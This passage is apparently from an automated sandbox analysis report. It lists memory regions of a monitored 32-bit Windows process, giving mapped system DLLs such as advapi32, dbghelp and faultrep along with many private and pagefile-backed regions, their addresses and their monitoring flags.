0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1223 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1224 start_va = 0x6cad0000 end_va = 0x6cb56fff monitored = 0 entry_point = 0x6cb3dbc0 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\SysWOW64\\wer.dll" (normalized: "c:\\windows\\syswow64\\wer.dll") Region: id = 1225 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1226 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1227 start_va = 0x77820000 end_va = 0x7789afff monitored = 0 entry_point = 0x7783e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1228 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1229 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1230 start_va = 0x6c990000 end_va = 0x6cacefff monitored = 0 entry_point = 0x6c9bd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 1231 start_va = 0x72700000 end_va = 0x72721fff monitored = 0 entry_point = 0x727091f0 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 1232 start_va = 0x75300000 end_va = 0x75336fff monitored = 0 entry_point = 0x75303b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1233 start_va = 0x742c0000 end_va = 0x742dafff monitored = 0 entry_point = 0x742c9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1234 start_va = 0x6c930000 end_va = 0x6c983fff monitored = 0 entry_point = 0x6c9610d0 region_type = mapped_file name = "faultrep.dll" filename = "\\Windows\\SysWOW64\\Faultrep.dll" (normalized: "c:\\windows\\syswow64\\faultrep.dll") Region: id = 1235 start_va = 0x70000000 end_va = 0x70020fff monitored = 0 entry_point = 0x7001a910 region_type = mapped_file name = "dbgcore.dll" filename = "\\Windows\\SysWOW64\\dbgcore.dll" (normalized: "c:\\windows\\syswow64\\dbgcore.dll") Region: id = 1236 start_va = 0x590000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 1237 start_va = 0x5e0000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 1238 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1239 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1240 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1241 start_va = 0x590000 end_va = 0x5b9fff monitored = 0 entry_point = 0x595680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1242 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 1243 start_va = 0x730000 end_va = 0x8b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 1244 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1245 start_va = 0x4940000 end_va = 0x4ac0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004940000" filename = "" Region: id = 1246 start_va = 0x4ad0000 end_va = 0x5ecffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ad0000" filename = "" Region: id = 1247 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1248 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1249 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1250 start_va = 0x410000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 1251 start_va = 0x590000 end_va = 0x590fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 1252 start_va = 0x5e0000 end_va = 0x62efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 1253 start_va = 0x720000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 1254 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1255 start_va = 0x630000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1256 start_va = 0x5a0000 end_va = 0x5a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1257 start_va = 0x5b0000 end_va = 0x5b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1258 start_va = 0x5c0000 end_va = 0x5c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1259 start_va = 0x757e0000 end_va = 0x757ebfff monitored = 0 entry_point = 0x757e3930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1260 start_va = 0x5c0000 end_va = 0x5c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1261 start_va = 0x5ed0000 end_va = 0x66cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005ed0000" filename = "" Region: id = 1262 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1263 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1264 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1265 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1266 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1267 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1268 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1269 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1270 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1271 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1272 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1273 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1274 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1275 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1276 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1277 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1278 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1279 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1280 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1281 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1282 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1283 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1284 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1285 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1286 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1287 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1288 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1289 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1290 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1291 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1292 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1293 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1294 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1295 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1296 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1297 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1298 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1299 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1300 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1301 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1302 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1303 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1304 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1305 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1306 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1307 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1308 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1309 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1310 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1311 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1312 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1313 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1314 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1315 start_va = 0x5c0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1316 start_va = 0x630000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1317 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 1318 start_va = 0x680000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 1319 start_va = 0x5ed0000 end_va = 0x5f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005ed0000" filename = "" Region: id = 1320 start_va = 0x5c0000 end_va = 0x5c1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "faultrep.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\faultrep.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\faultrep.dll.mui") Region: id = 1321 start_va = 0x630000 end_va = 0x630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1322 start_va = 0x6c510000 end_va = 0x6c92dfff monitored = 0 entry_point = 0x6c60ee80 region_type = mapped_file name = "dbgeng.dll" filename = "\\Windows\\SysWOW64\\dbgeng.dll" (normalized: "c:\\windows\\syswow64\\dbgeng.dll") Region: id = 1323 start_va = 0x76150000 end_va = 0x761e1fff monitored = 0 entry_point = 0x76188cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1324 start_va = 0x6b120000 end_va = 0x6b18ffff monitored = 0 entry_point = 0x6b174b90 region_type = mapped_file name = "dbgmodel.dll" filename = "\\Windows\\SysWOW64\\DbgModel.dll" (normalized: "c:\\windows\\syswow64\\dbgmodel.dll") Region: id = 1325 start_va = 0x70040000 end_va = 0x7006cfff monitored = 0 entry_point = 0x70052b00 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 1326 start_va = 0x5f50000 end_va = 0x6039fff monitored = 0 entry_point = 0x5f8d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1327 start_va = 0x6cc40000 end_va = 0x6cc49fff monitored = 0 entry_point = 0x6cc43200 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 1328 start_va = 0x75790000 end_va = 0x757d4fff monitored = 0 entry_point = 0x757ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1329 start_va = 0x70030000 end_va = 0x70037fff monitored = 0 entry_point = 0x700317b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1330 start_va = 0x5f50000 end_va = 0x604ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f50000" filename = "" Region: id = 1331 start_va = 0x75160000 end_va = 0x7524afff monitored = 0 entry_point = 0x7519d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1332 start_va = 0x6050000 end_va = 0x6386fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1333 start_va = 0x630000 end_va = 0x631fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1334 start_va = 0x630000 end_va = 0x633fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1335 start_va = 0x630000 end_va = 0x635fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1336 start_va = 0x630000 end_va = 0x637fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1337 start_va = 0x6390000 end_va = 0x648ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006390000" filename = "" Region: id = 1338 start_va = 0x630000 end_va = 0x639fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1339 start_va = 0x630000 end_va = 0x63bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1340 start_va = 0x630000 end_va = 0x63dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1341 start_va = 0x630000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1342 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1343 start_va = 0x630000 end_va = 0x643fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1344 start_va = 0x630000 end_va = 0x645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1345 start_va = 0x630000 end_va = 0x647fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1346 start_va = 0x630000 end_va = 0x649fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1347 start_va = 0x630000 end_va = 0x64bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1348 start_va = 0x630000 end_va = 0x64dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1349 start_va = 0x630000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1350 start_va = 0x630000 end_va = 0x651fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1351 start_va = 0x6490000 end_va = 0x658ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006490000" filename = "" Region: id = 1352 start_va = 0x6590000 end_va = 0x666ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 1353 start_va = 0x6670000 end_va = 0x6740fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 1354 start_va = 0x630000 end_va = 0x630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1355 start_va = 0x640000 end_va = 0x642fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wer.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wer.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wer.dll.mui") Region: id = 1356 start_va = 0x650000 end_va = 0x653fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 1357 start_va = 0x6670000 end_va = 0x6e6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006670000" filename = "" Region: id = 1358 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1359 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1360 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1361 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1362 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1363 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1364 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1365 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1366 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1367 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1368 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1369 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1370 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1371 start_va = 0x6670000 end_va = 0x676ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 1372 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1373 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1374 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1375 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1376 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1377 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1378 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1379 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1380 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1381 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1382 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1383 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1384 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1385 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1386 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1387 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1388 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1389 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1390 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1391 start_va = 0x660000 end_va 